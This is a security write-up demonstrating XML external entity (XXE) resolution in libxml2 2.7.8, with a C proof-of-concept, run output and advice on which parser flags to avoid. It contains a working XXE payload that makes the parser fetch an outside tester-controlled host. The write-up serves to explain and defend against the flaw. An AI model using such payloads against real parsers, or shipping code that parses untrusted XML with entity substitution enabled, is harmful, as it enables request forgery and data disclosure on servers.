libxml2 XXE vuln

libxml2 XXE demo code

dpkg -s libxml2-dev
#output
Package: libxml2-dev
Status: install ok installed
Multi-Arch: same
Priority: optional
Section: libdevel
Installed-Size: 2697
Maintainer: Ubuntu Developers <ubuntu-devel-discuss@lists.ubuntu.com>
Architecture: amd64
Source: libxml2
Version: 2.7.8.dfsg-5.1ubuntu4.17
Depends: libxml2 (= 2.7.8.dfsg-5.1ubuntu4.17)
Description: Development files for the GNOME XML library
 XML is a metalanguage to let you design your own markup language.
 A regular markup language defines a way to describe information in
 a certain class of documents (eg HTML). XML lets you define your
 own customized markup languages for many classes of document. It
 can do this because it's written in SGML, the international standard
 metalanguage for markup languages.
 .
 Install this package if you wish to develop your own programs using
 the GNOME XML library.
Homepage: http://xmlsoft.org/
Original-Maintainer: Debian XML/SGML Group <debian-xml-sgml-pkgs@lists.alioth.debian.org>
xmlDocPtr	xmlReadMemory		(const char * buffer, 
					 int size, 
					 const char * URL, 
					 const char * encoding, 
					 int options)

The `options` parameter is a bit mask of `xmlParserOption` flags (values below can be OR-ed together). The security-relevant ones for this demo are `XML_PARSE_NOENT` (substitute entities, which fetches external ones) and `XML_PARSE_DTDLOAD` (load the external subset); `XML_PARSE_NONET` is the flag that forbids network access.

Enum xmlParserOption {
    XML_PARSE_RECOVER = 1 : recover on errors
    XML_PARSE_NOENT = 2 : substitute entities
    XML_PARSE_DTDLOAD = 4 : load the external subset
    XML_PARSE_DTDATTR = 8 : default DTD attributes
    XML_PARSE_DTDVALID = 16 : validate with the DTD
    XML_PARSE_NOERROR = 32 : suppress error reports
    XML_PARSE_NOWARNING = 64 : suppress warning reports
    XML_PARSE_PEDANTIC = 128 : pedantic error reporting
    XML_PARSE_NOBLANKS = 256 : remove blank nodes
    XML_PARSE_SAX1 = 512 : use the SAX1 interface internally
    XML_PARSE_XINCLUDE = 1024 : Implement XInclude substitution
    XML_PARSE_NONET = 2048 : Forbid network access
    XML_PARSE_NODICT = 4096 : Do not reuse the context dictionary
    XML_PARSE_NSCLEAN = 8192 : remove redundant namespaces declarations
    XML_PARSE_NOCDATA = 16384 : merge CDATA as text nodes
    XML_PARSE_NOXINCNODE = 32768 : do not generate XINCLUDE START/END nodes
    XML_PARSE_COMPACT = 65536 : compact small text nodes; no modification of the tree allowed afterwards (will possibly crash if you try to modify the tree)
    XML_PARSE_OLD10 = 131072 : parse using XML-1.0 before update 5
    XML_PARSE_NOBASEFIX = 262144 : do not fixup XINCLUDE xml:base uris
    XML_PARSE_HUGE = 524288 : relax any hardcoded limit from the parser
    XML_PARSE_OLDSAX = 1048576 : parse using SAX2 interface before 2.7.0
    XML_PARSE_IGNORE_ENC = 2097152 : ignore internal document encoding hint
    XML_PARSE_BIG_LINES = 4194304 : Store big lines numbers in text PSVI field
}

Baseline: calling the parser with `options = 0`, i.e. no entity substitution and no DTD loading:

doc = xmlReadMemory(data, size, NULL, NULL, 0)

With `options == 0` the external entity is not fetched and the XXE has no effect. Adding the right flag makes the fetch happen — but it is not "any option > 0": only flags that turn on entity substitution or DTD loading trigger the external request, as the per-flag test below shows.

Tested one flag at a time on this libxml2 2.7.8 build: `XML_PARSE_NOENT` → external entity fetched (XXE works); `XML_PARSE_DTDLOAD` → fetched (XXE works); `XML_PARSE_RECOVER` → not fetched (XXE fails). `XML_PARSE_DTDVALID` was not tested here but requires the DTD and should be treated with the same caution. Practical rule for code that parses untrusted XML: never pass NOENT/DTDLOAD/DTDVALID, and add `XML_PARSE_NONET` as defence in depth (by its own description it only forbids network access, so it is not a substitute for leaving entity substitution off).

#include <stdio.h>
#include <stdlib.h>
#include <libxml/parser.h>
#include <libxml/tree.h>

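/*
 * XXE demo entry point.
 *
 * Parses an in-memory document whose internal DTD subset declares an
 * external parameter entity (SYSTEM "http://...") and references it, with
 * XML_PARSE_NOENT set. With entity substitution enabled, libxml2 resolves
 * the SYSTEM identifier while parsing and issues the HTTP request — the
 * out-of-band request is the observable effect of the XXE (see the I/O
 * warning in the run log). A server that parses attacker-controlled XML
 * with XML_PARSE_NOENT or XML_PARSE_DTDLOAD is exposed in exactly this way.
 *
 * argv is ignored. Returns 0 when a document was produced, 1 when the
 * parse yielded no document at all.
 */
int main(int argc, char **argv) {
    (void)argc;
    (void)argv;

    /*
     * The entity URL points at a host the tester controls; replace
     * 192.168.0.1:8000 with your own listener or DNS-log endpoint.
     * Written with plain "//": the original "\/\/" is not a C escape
     * sequence and only produced "unknown escape sequence" warnings.
     */
    static const char buf[] =
        "<?xml version=\"1.0\"?>\n"
        "<!DOCTYPE root [\n"
        "<!ENTITY % remote SYSTEM \"http://192.168.0.1:8000/1111\">\n"
        "%remote;]>"
        "<root/>";

    /*
     * sizeof(buf) counts the trailing NUL; hand the parser only the
     * document bytes. XML_PARSE_NOENT is what makes the external entity
     * fetch happen — omit it (and DTDLOAD/DTDVALID) for untrusted input.
     */
    xmlDocPtr doc = xmlReadMemory(buf, (int)(sizeof(buf) - 1), "noname.xml",
                                  NULL, XML_PARSE_NOENT);
    if (doc == NULL) {
        fprintf(stderr, "xmlReadMemory: no document produced\n");
        return 1;
    }

    xmlFreeDoc(doc);

    return 0;
}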
ubuntu@ubuntu:~$ gcc -std=c99 -O2 -I/usr/include/libxml2 test.c -lxml2 -o so
test.c: 在函数‘main’中:
test.c:29:2: 警告: 未知的转义序列:‘\/’ [默认启用]
test.c:29:2: 警告: 未知的转义序列:‘\/’ [默认启用]
(Chinese-locale gcc output. In English: "In function 'main': warning: unknown escape sequence: '\/' [enabled by default]". Both warnings come from the `\/\/` in the entity URL — `\/` is not a C escape, so gcc keeps the `/` and drops the backslash; write plain `//` instead.)
ubuntu@ubuntu:~$ ./so 
noname.xml:4: I/O warning : failed to load HTTP resource
%remote;]><root/>
        ^
 %remote; 
         ^

Your listener / DNS-log endpoint will record the request. Note that the parse itself only reports the I/O warning above and still returns; the out-of-band HTTP/DNS request is the evidence that the external entity was resolved.

Note

Note: starting with libxml2 2.9, external entities are no longer fetched by default (i.e. with `options = 0`), per the commit linked below. This only changes the default: an application that passes `XML_PARSE_NOENT` or `XML_PARSE_DTDLOAD` — as this demo does — still resolves external entities on 2.9 and later, so the flags an application sets, not the library version alone, decide whether it is exposed.

http://git.gnome.org/browse/libxml2/commit/?id=4629ee02ac649c27f9c0cf98ba017c6b5526070f.

reference
